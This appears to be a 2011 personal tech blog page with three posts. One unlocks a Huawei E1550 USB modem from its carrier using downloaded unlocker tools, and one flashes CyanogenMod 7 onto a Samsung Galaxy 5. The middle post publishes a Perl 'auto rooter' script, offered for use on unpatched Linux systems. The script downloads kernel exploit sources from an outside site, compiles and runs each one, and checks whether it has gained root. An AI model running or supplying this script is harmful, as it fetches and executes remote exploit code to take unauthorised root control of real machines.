Showing posts with label rooting. Show all posts
Showing posts with label rooting. Show all posts

Sep 1, 2011

How to unlock Idea netsetter E-1550

Idea NetSetter is a 3G HSDPA USB Device with the model number as Huawei E1550. The device has the maximum speed of 3.6 Mbps which means 330 KB/Sec of download speed.
Here i post for how to unlock Idea netsettar E-1550.

here are step by step tutorial on unlocking idea netsetter.

Here is the Step by step Solution:



First Download Following Softwere which gone we use:

1. modem firmware and Install it (Download from here ).
2. Mobile Partner’s 11.302.09.01.539 Voice USSD and install it > Click here to download.
3.download Video MMS Dashboard. Click here to Download it.
4.E-1550 Netsetter Unlock-er.Click here to Download it From Here.

Now follow the following Step:

1.Run the setup file which is downloaded in 1st step.
> i accept it and click next.
>then it will serch ur device.
>then it diplay the update setting.
>click next it show warnning.
>then it will ask u to input password
u have to Enter the Flash code which will we now generate in next step.
2. open unloacker dowloaded 4th and Put Ur IMEI number in it
>click unlock and it will generate Flash Code
>put Flash code into 1st step.
3.after putting flash code in 1st step click next.
>Update succefully.

4. Now, you are one step closer to unlocking of the NetSetter device. Start the setup file of HUAWEI_UTPS11.302.09.06.209 software and follow the steps. Again, ensure that the 3G device is not being used by any other software so that the application could find it easily.
>process as above step and it would download softwere in ur device.

5. This step involves installing the Huawei Original Unbranded Mobile Partner software on your computer to manage the 3G device. It is the same software that comes with NetSetter but it is just that it is unbranded and has no logo for any telecom company. But it is recommended to install to complete the unlocking procedure. It is like a normal software installation and does not require any specific guidelines.

Then put flash code on Flash code box and You are done with resetting your Idea netsetter modem E1550 SUCCESSFULLY!!!

NOW You can use the device for making voice calls right from your computer using the computer’s mic and speakers.





Enjoy with new Firmware in ur Device. any problem ask in comment-box,

thanx to my buddy ::H4(K3R4U

by::hemal modi

Aug 22, 2011

Auto Rooter Beta 2011 Code


2011 Linux Auto r00t3r Beta version 1.0 works well on unpatched systems. And requires internet connectivity currently for local exploits only.
It is a perl script and very easy to understand, modify and work as per required environment.

#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################n";
print "#             (Beta 1.0 )   <a title="Auto rooter" href="http://www.pentestit.com/tag/auto-rooter/">Auto rooter</a> by CrosS           #n";
print "#  Usage :                                                 #n";
print "#    perl $0 root    => To root            #n";
print "#    perl $0 del     => Delete <a title="Exploit" href="http://www.pentestit.com/tag/exploit/">Exploit</a>     #n";
print "#                                                          #n";
print "#       as R00TW0RM - Private Community is back            #n";
print "#                  so Releasing 2011 auto rooter =)        #n";
print "#   in case of error mailto: mr.0x0day[AT]live.com         #n";
print "#                                                          #n";
print "#        Thanks to: r0073r and L0rd CrusAd3r               #n";
print "#              <a title="http" href="http://www.pentestit.com/tag/http/">http</a>://www.r00tw0rm.com/forum               #n";
print "###########################################################nnn";
 
if ($ARGV[0] =~ "root" )
{
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");
}

Aug 9, 2011

Install Android Gingerbread 2.3 in Samsung Galaxy 5 [I5500/I5503] without rooting

Before going through this post i will suggest you to read previous post for froyo update in samsung galaxy here

The Galaxy 5 I5500, also known as the Corby I5500 has been around in the Android world since June 2010. The phone is one of the lower-end budget friendly Android devices out there who’s time is running out as new devices and ROMs arrive on the scene. However, XDA-Developers forum member subpsyke has recently ported the famous CyanogenMod 7 custom ROM on to the Galaxy 5 which has just given the device a new lease of life. More on the ROM and how to install it after the break.


The release is CM 7.0.3 based on Android 2.3.3 Gingerbread but far from perfect. In no way is this ROM meant as a daily driver, but for those who know their way around ADB, recoveries, ODIN etc., can give this ROM a try and provide the developer with feedback that could help in fixing the bugs or issues that remain. So if you do wish to give it a try, let us point out the working and broken features.








Working features:
* GPS [1]
* WiFi [2]
* WiFi tethering
* 3G
* Sensors [3]
* Brightness controls* Video
* Audio (recording and playback)
* Touchscreen (no multitouch, don't ask because I'm not working on it)
* Root
* Camera (and video recorder)
* Bluetooth [4]

Partially working features:
* Telephony [5]
* Microphone [6]

Not working/unknown features:
* Radio
* MAD Team EXT4 app2sd [7]
* SIM Contacts / SIM Toolkit
* Kies – note: you should never expect a custom rom to work with Kies – Cyanogen or otherwise. You can always downgrade to an official ROM to restore Kies compatibility.
* Hardware encoding/decoding (video acceleration).




Errata:
[1] GPS does not work with the newest Americas baseband ending in JP9. Check your version at Settings -> About phone -> Baseband. If you have the new baseband, you should downgrade to the JP2 baseband to get GPS (and possibly also 3G) working correctly. GPS is confirmed to work correctly on all European basebands (so far).
[2] WiFi functions properly (connect/disconnect, signal strength and mac address are all working correctly). There may still be problems with automatic reconnection from idle states, and if you quickly turn off/on the WiFi device, DHCP may be slow to connect. I'm still working on these problems.
[3] Although the sensors seems to work fine, the sensor daemon is draining battery like crazy. With sensors enabled, the phone does between 800-1000 wakeups a second. With the sensors turned off, the phone does just 70-80 wakeups a second (note: less wakeups = less battery used). Until this daemon problem is fixed, I recommend that you consider disabling the sensors (Settings -> Display -> Auto-rotate screen) for maximum battery savings. Another problem: you must toggle (turn back on and off) this setting after each reboot, or else the battery drain will continue even though the sensors are supposed to be turned off :/.
[4] Your Bluetooth MAC address will not be correct on the very first start (i.e., the first boot after doing a data wipe). However, on the next reboot (and all future reboots) it will use the proper address. In future I hope to resolve this small problem.
[5] When you first boot the phone, if you receive a call and try to answer with the hardware keys, your phone will reboot. You can clear this bug by making an outgoing call after you first turn on the phone. If you do this, the bug will not return until you turn off your phone. If you receive an incoming call but you forgot to clear the bug, answering with the touchscreen controls instead of hardware keys may not cause a reboot.
[6] The microphone beside the earpiece is activated instead of the microphone at your mouth. This means that callers may have problems with call quality, since they're listening to your ear . Until this bug is fixed, I recommend you practice telepathy with your friends (maybe the earpiece microphone will help transmit your thoughts).
[7] I won't add MAD Team app2sd support until this rom is stable (i.e., the microphone, reboot and battery usage bugs are fixed). This should only be used for testing, not for regular use, so I don't want to encourage people to use it so heavily. You can still use Cyanogen's built-in app2sd (the "Move to SD" button) - it's more advanced than Froyo's.




this steps are similar to froyo update that got a huge success for galaxy 5



Requirements:
-->>ODIN installed on your system.download
-->>Samsung USB drivers installed. Download USB drivers for 32 bit Windows | For 64 bit Windows.
-->>CyanogenMod 7 ROM.

Instructions:
  • To begin, download the ROM from the link above and extract it to find a .tar file.
  • Run ODIN, check the One Package option and click on the One Package tab choosing the .tar file you extracted in step 1 when prompted. (If you’re coming from a Froyo or Éclair based ROM, be sure to do a factory reset.)
  • That done, put your phone in download mode by taking the battery out, putting it back in after 5 seconds and pressing the Volume Up key, Center button and the Power button at the same time.
  • Once done, connect it to the PC via USB and click on Start in ODIN.

Once the ROM is flashed, the phone should reboot into CM7. The first boot will be slower then normal and you may see a bootloop but that is normal.



this is similar to this steps...just the .tar file will be different..and u will get gingerbread in your device



note::i personally not suggest u to try this with your phone that is on daily use..if u have another phone for stand by then u can try it for sure ,,it is working great..i have tried it my self.


thanx to cyanogenmod.com/ for thr support..


by - hemal modi

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More